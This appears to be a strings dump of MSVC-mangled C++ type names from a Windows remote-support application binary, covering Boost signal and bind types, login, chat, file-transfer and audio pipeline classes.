.?AV?$sp_counted_impl_p@Vinvocation_state@?$signal_impl@$$A6AXABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@ZV?$optional_last_value@X@signals2@2@HU?$less@H@std@@V?$function@$$A6AXABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@Z@2@V?$function@$$A6AXABVconnection@signals2@boost@@ABV?$shared_ptr@VData@MultimediaPipeline@@@3@@Z@2@Vmutex@42@@detail@signals2@boost@@@detail@boost@@
.?AV?$sp_counted_impl_p@V?$signal_impl@$$A6AXABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@ZV?$optional_last_value@X@signals2@2@HU?$less@H@std@@V?$function@$$A6AXABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@Z@2@V?$function@$$A6AXABVconnection@signals2@boost@@ABV?$shared_ptr@VData@MultimediaPipeline@@@3@@Z@2@Vmutex@42@@detail@signals2@boost@@@detail@boost@@
.?AV?$connection_body@U?$pair@W4slot_meta_group@detail@signals2@boost@@V?$optional@H@4@@std@@V?$slot@$$A6AXABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@ZV?$function@$$A6AXABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@Z@2@@signals2@boost@@Vmutex@45@@detail@signals2@boost@@
.?AU?$unary_function@ABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@X@std@@
.?AU?$std_functional_base@XABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@detail@signals2@boost@@
.?AV?$signal@$$A6AXABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@ZV?$optional_last_value@X@signals2@2@HU?$less@H@std@@V?$function@$$A6AXABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@Z@2@V?$function@$$A6AXABVconnection@signals2@boost@@ABV?$shared_ptr@VData@MultimediaPipeline@@@3@@Z@2@Vmutex@42@@signals2@boost@@
.?AVIDataSupplier@MultimediaPipeline@@
.?AVTapFilter@MultimediaPipeline@@
.?AVIDataSplitter@MultimediaPipeline@@
.?AVIDataMerger@MultimediaPipeline@@
.?AV?$sp_counted_impl_pd@PAVPipelineJitterBufferPacketData@tvmultimedia@@V?$sp_ms_deleter@VPipelineJitterBufferPacketData@tvmultimedia@@@detail@boost@@@detail@boost@@
.?AV?$sp_ms_deleter@VPipelineJitterBufferPacketData@tvmultimedia@@@detail@boost@@
.?AV?$bind_t@XV?$mf2@XVAccountPictureUpload@tvgui@@W4eCmd@CBuddyClientReceive@2@PAX@_mfi@boost@@V?$list3@V?$value@PAVAccountPictureUpload@tvgui@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf3@XVAccountPictureUpload@tvgui@@ABV?$shared_ptr@VAccountPictureUploadRequest@tvgui@@@boost@@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$shared_ptr@VCRCmdAck@tvhelper@@@4@@_mfi@boost@@V?$list4@V?$value@V?$shared_ptr@VAccountPictureUpload@tvgui@@@boost@@@_bi@boost@@V?$value@V?$shared_ptr@VAccountPictureUploadRequest@tvgui@@@boost@@@23@V?$value@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@23@V?$value@V?$shared_ptr@VCRCmdAck@tvhelper@@@boost@@@23@@_bi@3@@_bi@boost@@
.?AV?$sp_counted_impl_pd@PAV?$ResultAndErrorCallback@ABULoginToken@Account@tvguibackend@@@tvguibackend@@V?$sp_ms_deleter@V?$ResultAndErrorCallback@ABULoginToken@Account@tvguibackend@@@tvguibackend@@@detail@boost@@@detail@boost@@
.?AV?$sp_ms_deleter@V?$ResultAndErrorCallback@ABULoginToken@Account@tvguibackend@@@tvguibackend@@@detail@boost@@
.?AVInterProcessShared@tvshared@@
.?AV?$sp_counted_impl_p@UPasswordDialogStatus@tvgui@@@detail@boost@@
.?AV?$sp_counted_impl_p@VCLoginClient@tvgui@@@detail@boost@@
.?AVCLoginClient@tvgui@@
.?AVCLogin@tvshared@@
.?AV?$bind_t@XV?$mf2@XVCLoginClient@tvgui@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@_N@_mfi@boost@@V?$list3@V?$value@PAVCLoginClient@tvgui@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf2@XVCLoginClient@tvgui@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@H@_mfi@boost@@V?$list3@V?$value@PAVCLoginClient@tvgui@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@_NV?$mf1@_NVCLoginClient@tvgui@@ABVBCommand@tvhelper@@@_mfi@boost@@V?$list2@V?$value@PAVCLoginClient@tvgui@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@Uunspecified@_bi@boost@@U?$weak_fn_and_ptr_data@U?$shared_ptr_mem_fn@P8CLoginClient@tvgui@@AEXABVBCommand@tvhelper@@W4ECallbackResult@CBCommandCallback@tvclientbase@@ABV?$weak_ptr@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@boost@@@ZXV12@ABV34@W4567@ABV89@@detail@tvstd@@Uweak_fn_ignore_void_policy@23@U?$ArgumentStorage@ABVBCommand@tvhelper@@W4ECallbackResult@CBCommandCallback@tvclientbase@@ABV?$weak_ptr@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@boost@@@23@@detail@tvstd@@V?$list3@U?$arg@$00@boost@@U?$arg@$01@2@V?$value@V?$weak_ptr@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@boost@@@_bi@2@@23@@_bi@boost@@
.?AV?$sp_counted_impl_p@VAsynchronousPipe@MultimediaPipeline@@@detail@boost@@
.?AVAsynchronousPipe@MultimediaPipeline@@
.?AV?$enable_shared_from_this@VAsynchronousPipe@MultimediaPipeline@@@boost@@
.?AV?$bind_t@XV?$mf1@XVAsynchronousPipe@MultimediaPipeline@@ABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VAsynchronousPipe@MultimediaPipeline@@@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$sp_counted_impl_p@VClock@MultimediaPipeline@@@detail@boost@@
.?AVControlDataSenderStatus@MultimediaPipeline@@
.?AVDelegatingFilter@MultimediaPipeline@@
.?AV?$enable_shared_from_this@VFusionPipe@MultimediaPipeline@@@boost@@
.?AV?$sp_counted_impl_p@VFusionPipe@MultimediaPipeline@@@detail@boost@@
.?AVFusionPipe@MultimediaPipeline@@
.?AV?$bind_t@XV?$mf2@XVFusionPipe@MultimediaPipeline@@JABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@_mfi@boost@@V?$list3@V?$value@V?$shared_ptr@VFusionPipe@MultimediaPipeline@@@boost@@@_bi@boost@@V?$value@J@23@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$enable_shared_from_this@VSynchronousPipe@MultimediaPipeline@@@boost@@
.?AV?$sp_counted_impl_p@VSynchronousPipe@MultimediaPipeline@@@detail@boost@@
.?AVSynchronousPipe@MultimediaPipeline@@
.?AV?$bind_t@XV?$mf1@XVSynchronousPipe@MultimediaPipeline@@ABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VSynchronousPipe@MultimediaPipeline@@@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$sp_counted_impl_pd@PAVThreadPool@MultimediaPipeline@@P6AXPAV12@@Z@detail@boost@@
.?AV?$thread_data@V?$bind_t@XP6AXIV?$weak_ptr@VThreadPool@MultimediaPipeline@@@boost@@@ZV?$list2@V?$value@I@_bi@boost@@V?$value@V?$weak_ptr@VThreadPool@MultimediaPipeline@@@boost@@@23@@_bi@2@@_bi@boost@@@detail@boost@@
.P6AXPAVThreadPool@MultimediaPipeline@@@Z
.?AVSpeexEchoCancellationFilter@tvmultimedia@@
.?AV?$bind_t@XV?$mf2@XVRequestInstantSupportSessionLogic@tvgui@@W4eCmd@CBuddyClientReceive@2@PAX@_mfi@boost@@V?$list3@V?$value@PAVRequestInstantSupportSessionLogic@tvgui@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf2@XVRequestInstantSupportSessionLogic@tvgui@@ABUBuddyResponse@tvbuddytypes@@ABUInstantSupportData@tvhelper@@@_mfi@boost@@V?$list3@V?$value@V?$shared_ptr@VRequestInstantSupportSessionLogic@tvgui@@@boost@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf3@XVRequestInstantSupportSessionLogic@tvgui@@ABUBuddyResponse@tvbuddytypes@@ABUGroupInfoForGroupName@CBuddyClientSend@2@_N@_mfi@boost@@V?$list4@V?$value@V?$shared_ptr@VRequestInstantSupportSessionLogic@tvgui@@@boost@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@U?$arg@$02@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf2@XVRequestInstantSupportSessionLogic@tvgui@@ABUBuddyResponse@tvbuddytypes@@I@_mfi@boost@@V?$list3@V?$value@V?$shared_ptr@VRequestInstantSupportSessionLogic@tvgui@@@boost@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@@_bi@3@@_bi@boost@@
.P6AXABV?$weak_ptr@VIDataSupplier@MultimediaPipeline@@@boost@@@Z
.?AV?$sp_counted_impl_p@VFlowControlItemFactory@MultimediaPipeline@@@detail@boost@@
.?AV?$sp_counted_impl_p@Vinvocation_state@?$signal_impl@$$A6AXABV?$weak_ptr@VIDataSupplier@MultimediaPipeline@@@boost@@@ZV?$optional_last_value@X@signals2@2@HU?$less@H@std@@V?$function@$$A6AXABV?$weak_ptr@VIDataSupplier@MultimediaPipeline@@@boost@@@Z@2@V?$function@$$A6AXABVconnection@signals2@boost@@ABV?$weak_ptr@VIDataSupplier@MultimediaPipeline@@@3@@Z@2@Vmutex@42@@detail@signals2@boost@@@detail@boost@@
.?AV?$sp_counted_impl_p@V?$grouped_list@HU?$less@H@std@@V?$shared_ptr@V?$connection_body@U?$pair@W4slot_meta_group@detail@signals2@boost@@V?$optional@H@4@@std@@V?$slot@$$A6AXABV?$weak_ptr@VIDataSupplier@MultimediaPipeline@@@boost@@@ZV?$function@$$A6AXABV?$weak_ptr@VIDataSupplier@MultimediaPipeline@@@boost@@@Z@2@@signals2@boost@@Vmutex@45@@detail@signals2@boost@@@boost@@@detail@signals2@boost@@@detail@boost@@
.?AV?$sp_counted_impl_p@V?$signal_impl@$$A6AXABV?$weak_ptr@VIDataSupplier@MultimediaPipeline@@@boost@@@ZV?$optional_last_value@X@signals2@2@HU?$less@H@std@@V?$function@$$A6AXABV?$weak_ptr@VIDataSupplier@MultimediaPipeline@@@boost@@@Z@2@V?$function@$$A6AXABVconnection@signals2@boost@@ABV?$weak_ptr@VIDataSupplier@MultimediaPipeline@@@3@@Z@2@Vmutex@42@@detail@signals2@boost@@@detail@boost@@
.?AV?$sp_counted_impl_p@VVoiceReceiverAudioPipeline@tvmultimedia@@@detail@boost@@
.?AV?$sp_counted_impl_p@VTapFilter@MultimediaPipeline@@@detail@boost@@
.?AU?$std_functional_base@XABV?$weak_ptr@VIDataSupplier@MultimediaPipeline@@@boost@@@detail@signals2@boost@@
.?AU?$unary_function@ABV?$weak_ptr@VIDataSupplier@MultimediaPipeline@@@boost@@X@std@@
.?AV?$signal@$$A6AXABV?$weak_ptr@VIDataSupplier@MultimediaPipeline@@@boost@@@ZV?$optional_last_value@X@signals2@2@HU?$less@H@std@@V?$function@$$A6AXABV?$weak_ptr@VIDataSupplier@MultimediaPipeline@@@boost@@@Z@2@V?$function@$$A6AXABVconnection@signals2@boost@@ABV?$weak_ptr@VIDataSupplier@MultimediaPipeline@@@3@@Z@2@Vmutex@42@@signals2@boost@@
.?AV?$bind_t@VDataStreamInfo@MultimediaPipeline@@P6A?AV12@ABV?$weak_ptr@VVoIPBCommandReceiver@tvmultimedia@@@boost@@@ZV?$list1@V?$value@V?$weak_ptr@VVoIPBCommandReceiver@tvmultimedia@@@boost@@@_bi@boost@@@_bi@4@@_bi@boost@@
.?AV?$sp_counted_impl_pd@PAVVoiceReceiverChannelPipeline@tvmultimedia@@V?$sp_ms_deleter@VVoiceReceiverChannelPipeline@tvmultimedia@@@detail@boost@@@detail@boost@@
.?AVVoiceReceiverChannelPipeline@tvmultimedia@@
.?AV?$sp_ms_deleter@VVoiceReceiverChannelPipeline@tvmultimedia@@@detail@boost@@
.PAVexpired_slot@signals2@boost@@
.?AV?$bind_t@XV?$mf1@XVVoiceReceiverMonitor@tvmultimedia@@ABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@_mfi@boost@@V?$list2@V?$value@PAVVoiceReceiverMonitor@tvmultimedia@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$sp_counted_impl_p@VDataFusionFilter@MultimediaPipeline@@@detail@boost@@
.?AVVoiceSenderV3EncodingPipeline@tvmultimedia@@
.?AVIVoiceSenderEncodingPipeline@tvmultimedia@@
.?AVVoiceSenderV1EncodingPipeline@tvmultimedia@@
.?AV?$sp_counted_impl_p@VForwardingFilter@MultimediaPipeline@@@detail@boost@@
.?AVISourceFilter@MultimediaPipeline@@
.?AV?$CRSModuleConnectorBase@$0BA@VCSendFileModule_Base@tvremotesupport@@@tvgui@@
.?AVIModuleStateListener@tvremotesupport@@
.?AUISendFileModuleUIReceiver@tvremotesupport@@
.?AVIRSModuleFactory@tvremotesupport@@
.?AV?$bind_t@XV?$mf2@XVClientWindow@tvgui@@W4eCmd@CBuddyClientReceive@2@PAX@_mfi@boost@@V?$list3@V?$value@PAVClientWindow@tvgui@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@@_bi@3@@_bi@boost@@
.?AVCHttpRequestDispatcher@BrowserUI@tvgui@@
.?AV?$bind_t@XV?$mf2@XVRemoteDesktopPanelDropHandlerWin@tvgui@@ABV?$shared_ptr@VCRemoteDesktopPanelWin@tvgui@@@boost@@UTargetOperation@tvdatatransceiver@@@_mfi@boost@@V?$list3@V?$value@V?$shared_ptr@VRemoteDesktopPanelDropHandlerWin@tvgui@@@boost@@@_bi@boost@@V?$value@V?$shared_ptr@VCRemoteDesktopPanelWin@tvgui@@@boost@@@23@V?$value@UTargetOperation@tvdatatransceiver@@@23@@_bi@3@@_bi@boost@@
.?AVIFTWindowClientFileListsOperations@tvgui@@
.?AV?$bind_t@XV?$mf6@XVIFTWindowClientFileListsOperations@tvgui@@W4LocalOrRemote@2@W4FILETYPE@2@ABVpath@filesystem@boost@@ABU_WIN32_FIND_DATAW@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@W4eDriveType@tvdatatransceiver@@@_mfi@boost@@V?$list7@V?$value@V?$shared_ptr@VIFTWindowClientFileListsOperations@tvgui@@@boost@@@_bi@boost@@V?$value@W4LocalOrRemote@tvgui@@@23@V?$value@W4FILETYPE@tvgui@@@23@V?$value@Vpath@filesystem@boost@@@23@V?$value@U_WIN32_FIND_DATAW@@@23@V?$value@PB_W@23@V?$value@W4eDriveType@tvdatatransceiver@@@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf5@XVFTWindowClientStatusHandler@tvgui@@W4FileOperationType@IClassicalFileTransferStatusHandlerClient@tvdatatransceiver@@ABVpath@filesystem@boost@@ABV678@H_N@_mfi@boost@@V?$list6@V?$value@PAVFTWindowClientStatusHandler@tvgui@@@_bi@boost@@V?$value@W4FileOperationType@IClassicalFileTransferStatusHandlerClient@tvdatatransceiver@@@23@V?$value@Vpath@filesystem@boost@@@23@V523@V?$value@H@23@V?$value@_N@23@@_bi@3@@_bi@boost@@
.?AV?$sp_counted_impl_p@VCMainWindowSC@tvgui@@@detail@boost@@
.?AV?$sp_counted_impl_pd@PAVInstantSupportCase@tvgui@@V?$sp_ms_deleter@VInstantSupportCase@tvgui@@@detail@boost@@@detail@boost@@
.?AVCMainWindowSC@tvgui@@
.?AV?$bind_t@XV?$mf2@XVCMainWindow@tvgui@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@H@_mfi@boost@@V?$list3@V?$value@PAVCMainWindowSC@tvgui@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf0@XVCMainWindowSC@tvgui@@@_mfi@boost@@V?$list1@V?$value@PAVCMainWindowSC@tvgui@@@_bi@boost@@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf2@XVCMainWindow@tvgui@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$variant@W4EVariantUndefined@@HV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@_NV?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@boost@@V?$vector@HV?$allocator@H@std@@@3@V?$vector@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V?$allocator@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@3@V?$vector@_NV?$allocator@_N@std@@@3@_JV?$vector@V?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@boost@@V?$allocator@V?$tuple@IV?$shared_array@E@boost@@Unull_type@tuples@2@U342@U342@U342@U342@U342@U342@U342@@tuples@boost@@@std@@@3@V?$vector@_JV?$allocator@_J@std@@@3@NUvoid_@0detail@6@Uvoid_@0detail@6@Uvoid_@0detail@6@Uvoid_@0detail@6@Uvoid_@0detail@6@Uvoid_@0detail@6@Uvoid_@0detail@6@Uvoid_@0detail@6@@boost@@@_mfi@boost@@V?$list3@V?$value@PAVCMainWindowSC@tvgui@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf2@XVCMainWindowSC@tvgui@@HABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@_mfi@boost@@V?$list3@V?$value@V?$shared_ptr@VCMainWindowSC@tvgui@@@boost@@@_bi@boost@@V?$value@H@23@V?$value@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@23@@_bi@3@@_bi@boost@@
.?AV?$sp_ms_deleter@VInstantSupportCase@tvgui@@@detail@boost@@
.?AVSpeexEchoCancellationProcessor@tvmultimedia@@
.?AV?$sp_counted_impl_pd@PAVCInstantSupportInfoWindowWin@tvgui@@P6AXPAV12@@Z@detail@boost@@
.?AVCInstantSupportInfoWindowWin@tvgui@@
.?AVCInstantSupportInfoWindow@tvgui@@
.P6AXPAVCInstantSupportInfoWindowWin@tvgui@@@Z
.?AV?$sp_counted_impl_p@VCWebDownloaderWin@tvgui@@@detail@boost@@
.?AV?$enable_shared_from_this@VCWebDownloader@tvgui@@@boost@@
.?AVCWebDownloader@tvgui@@
.?AVIPipelineSinkBuffer@tvmultimedia@@
.?AV?$sp_counted_impl_p@VSpeexEchoCancellationFilter@tvmultimedia@@@detail@boost@@
.?AV?$sp_counted_impl_p@VSpeexEchoCancellationProcessor@tvmultimedia@@@detail@boost@@
.?AV?$sp_counted_impl_p@VVoiceSenderAudioPipeline@tvmultimedia@@@detail@boost@@
.?AV?$enable_shared_from_this@VVoiceSenderAudioPipeline@tvmultimedia@@@boost@@
.?AVVoiceSenderAudioPipeline@tvmultimedia@@
.?AVIActiveSource@MultimediaPipeline@@
.?AV?$sp_counted_impl_p@VCKeyboard@tvshared@@@detail@boost@@
.?AV?$bind_t@XV?$mf2@XVCBuddyChatProcessor@tvgui@@W4eCmd@CBuddyClientReceive@2@PAX@_mfi@boost@@V?$list3@V?$value@PAVCBuddyChatProcessor@tvgui@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@@_bi@3@@_bi@boost@@
.?AV?$sp_counted_impl_p@UQuickJoinRequestMapEntry@CInvitePartnerToSession@tvgui@@@detail@boost@@
.?AV?$sp_counted_impl_p@UQuickJoinParticipantRequest@CInvitePartnerToSession@tvgui@@@detail@boost@@
.?AV?$bind_t@XV?$mf1@XUQuickJoinParticipantRequest@CInvitePartnerToSession@tvgui@@W4MessageBoxButton@IMessageBox@tvshared@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@UQuickJoinParticipantRequest@CInvitePartnerToSession@tvgui@@@boost@@@_bi@boost@@V?$value@W4MessageBoxButton@IMessageBox@tvshared@@@23@@_bi@3@@_bi@boost@@
.?AV?$sp_counted_impl_p@UMeetingQuickJoinData@CMeetingQuickJoin@tvgui@@@detail@boost@@
.?AUMeetingQuickJoinData@CMeetingQuickJoin@tvgui@@
.?AV?$bind_t@XP6AXW4eCmd@CBuddyClientReceive@tvgui@@PAX@ZV?$list2@U?$arg@$00@boost@@U?$arg@$01@2@@_bi@boost@@@_bi@boost@@
.?AV?$bind_t@XV?$mf1@XVIControl@tvgui@@W4eSCMD_RT@CServerClientBaseGUI@2@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VIControl@tvgui@@@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf3@XVCHostedBrowserDialogWin@tvgui@@PAVCWindow@ATL@@ABUHostedBrowserDialogInfo@CMessageLayer@2@ABVconnection@signals2@boost@@@_mfi@boost@@V?$list4@V?$value@V?$shared_ptr@VCHostedBrowserDialogWin@tvgui@@@boost@@@_bi@boost@@V?$value@PAVCWindow@ATL@@@23@V?$value@UHostedBrowserDialogInfo@CMessageLayer@tvgui@@@23@V?$value@Vconnection@signals2@boost@@@23@@_bi@3@@_bi@boost@@
.?AV?$sp_counted_impl_p@VCFirewallMsg@tvgui@@@detail@boost@@
.?AV?$bind_t@Uunspecified@_bi@boost@@U?$weak_fn_and_ptr_data@U?$shared_ptr_mem_fn@P8CFirewallMsg@tvgui@@AEXW4MessageBoxButton@IMessageBox@tvshared@@@ZXV12@W4345@@detail@tvstd@@Uweak_fn_ignore_void_policy@23@U?$ArgumentStorage@W4MessageBoxButton@IMessageBox@tvshared@@@23@@detail@tvstd@@V?$list1@U?$arg@$00@boost@@@23@@_bi@boost@@
.?AU?$weak_fn_and_ptr_data@U?$shared_ptr_mem_fn@P8CFirewallMsg@tvgui@@AEXABVBCommand@tvhelper@@W4ECallbackResult@CBCommandCallback@tvclientbase@@@ZXV12@ABV34@W4567@@detail@tvstd@@Uweak_fn_ignore_void_policy@23@U?$ArgumentStorage@ABVBCommand@tvhelper@@W4ECallbackResult@CBCommandCallback@tvclientbase@@@23@@detail@tvstd@@
.?AV?$bind_t@XV?$mf1@XVCRemoteAudioCaptureProcessor@tvmultimedia@@ABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@_mfi@boost@@V?$list2@V?$value@PAVCRemoteAudioCaptureProcessor@tvmultimedia@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf5@XVCRestoreSession@tvgui@@IIABVSupportSessionIdentifier@tvhelper@@H_N@_mfi@boost@@V?$list6@V?$value@PAVCRestoreSession@tvgui@@@_bi@boost@@V?$value@I@23@V423@V?$value@VSupportSessionIdentifier@tvhelper@@@23@V?$value@H@23@V?$value@_N@23@@_bi@3@@_bi@boost@@
.?AV?$thread_data@V?$bind_t@XV?$mf2@W4Result@tvwebdownload@tvclientbase@@VCWebDownloader@tvgui@@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@7@@_mfi@boost@@V?$list3@V?$value@V?$shared_ptr@VCWebDownloader@tvgui@@@boost@@@_bi@boost@@V?$value@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@23@V?$value@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@23@@_bi@3@@_bi@boost@@@detail@boost@@
.?AV?$CComObject@VCHttpRedirectionProtocol@BrowserUI@tvgui@@@ATL@@
.?AV?$CComAggObject@VCHttpRedirectionProtocol@BrowserUI@tvgui@@@ATL@@
.?AV?$CComContainedObject@VCHttpRedirectionProtocol@BrowserUI@tvgui@@@ATL@@
.?AV?$CInternetProtocol@VNoSinkStartPolicy@PassthroughAPP@@VCComMultiThreadModel@ATL@@@PassthroughAPP@@
.?AVCComClassFactoryProtocol@PassthroughAPP@@
.?AVCHttpRedirectionProtocolFactory@@
.?AV?$CComObjectNoLock@VCHttpRedirectionProtocolFactory@@@ATL@@
.?AUIPassthroughObject@@
.?AVIInternetProtocolImpl@PassthroughAPP@@
.?AVCHttpRedirectionProtocol@BrowserUI@tvgui@@
.?AVNoSinkStartPolicy@PassthroughAPP@@
.?AUIWinInetHttpInfo@@
.?AVCHttpRequestRootDispatcher@BrowserUI@tvgui@@
.?AV?$bind_t@XV?$mf2@XVCServerGUI@tvgui@@HW4TVCommand_TVCmdDisplay_State@tvhelper@@@_mfi@boost@@V?$list3@V?$value@V?$shared_ptr@VCServerGUI@tvgui@@@boost@@@_bi@boost@@V?$value@H@23@V?$value@W4TVCommand_TVCmdDisplay_State@tvhelper@@@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XP6AXW4LoginState@Account@tvguibackend@@@ZV?$list1@U?$arg@$00@boost@@@_bi@boost@@@_bi@boost@@
.?AV?$bind_t@XV?$mf1@XVCMainWindow@tvgui@@ABUHostedBrowserDialogInfo@CMessageLayer@2@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCMainWindow@tvgui@@@boost@@@_bi@boost@@V?$value@UHostedBrowserDialogInfo@CMessageLayer@tvgui@@@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf3@XVCServerClientBaseGUI@tvgui@@W4MessageBoxButton@IMessageBox@tvshared@@ABUSCollabConfigCloseDialog@2@V?$function@$$A6AXW4eSCMD_RT@CServerClientBaseGUI@tvgui@@@Z@boost@@@_mfi@boost@@V?$list4@V?$value@V?$shared_ptr@VCServerClientBaseGUI@tvgui@@@boost@@@_bi@boost@@U?$arg@$00@3@V?$value@USCollabConfigCloseDialog@tvgui@@@23@V?$value@V?$function@$$A6AXW4eSCMD_RT@CServerClientBaseGUI@tvgui@@@Z@boost@@@23@@_bi@3@@_bi@boost@@
.?AVAccessControlCustomDialogInterface@tvgui@@
.?AV?$bind_t@XV?$mf3@XVCBListRoot@tvgui@@W4eCmd@CBuddyClientReceive@2@PAXUtAccountProperties@tvbuddytypes@@@_mfi@boost@@V?$list4@V?$value@PAVCBListRoot@tvgui@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@V?$value@UtAccountProperties@tvbuddytypes@@@23@@_bi@3@@_bi@boost@@
.?AV?$sp_counted_impl_p@V?$signal_impl@$$A6AXW4eCmd@CBuddyClientReceive@tvgui@@PAX@ZV?$optional_last_value@X@signals2@boost@@HU?$less@H@std@@V?$function@$$A6AXW4eCmd@CBuddyClientReceive@tvgui@@PAX@Z@6@V?$function@$$A6AXABVconnection@signals2@boost@@W4eCmd@CBuddyClientReceive@tvgui@@PAX@Z@6@Vmutex@56@@detail@signals2@boost@@@detail@boost@@
.?AU?$binary_function@W4eCmd@CBuddyClientReceive@tvgui@@PAXX@std@@
.?AV?$signal@$$A6AXW4eCmd@CBuddyClientReceive@tvgui@@PAX@ZV?$optional_last_value@X@signals2@boost@@HU?$less@H@std@@V?$function@$$A6AXW4eCmd@CBuddyClientReceive@tvgui@@PAX@Z@6@V?$function@$$A6AXABVconnection@signals2@boost@@W4eCmd@CBuddyClientReceive@tvgui@@PAX@Z@6@Vmutex@56@@signals2@boost@@
.?AU?$std_functional_base@XW4eCmd@CBuddyClientReceive@tvgui@@PAX@detail@signals2@boost@@
.?AV?$bind_t@XP6AXABW4eCmd@CBuddyClientReceive@tvgui@@_N@ZV?$list2@V?$value@W4eCmd@CBuddyClientReceive@tvgui@@@_bi@boost@@V?$value@_N@23@@_bi@boost@@@_bi@boost@@
.?AV?$sp_counted_impl_pd@PAV?$function@$$A6AXABUBuddyResponse@tvbuddytypes@@ABUInstantSupportData@tvhelper@@@Z@boost@@V?$sp_ms_deleter@V?$function@$$A6AXABUBuddyResponse@tvbuddytypes@@ABUInstantSupportData@tvhelper@@@Z@boost@@@detail@2@@detail@boost@@
.?AV?$sp_ms_deleter@V?$function@$$A6AXABUBuddyResponse@tvbuddytypes@@ABUInstantSupportData@tvhelper@@@Z@boost@@@detail@boost@@
.?AVCMsgPlayer@tvmultimedia@@
.?AV?$bind_t@XV?$mf0@XVCMsgPlayer@tvmultimedia@@@_mfi@boost@@V?$list1@V?$value@PAVCMsgPlayer@tvmultimedia@@@_bi@boost@@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf1@XVCInstantSupportInfoWindowWin@tvgui@@VWindowIdentifier@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCInstantSupportInfoWindowWin@tvgui@@@boost@@@_bi@boost@@V?$value@VWindowIdentifier@@@23@@_bi@3@@_bi@boost@@
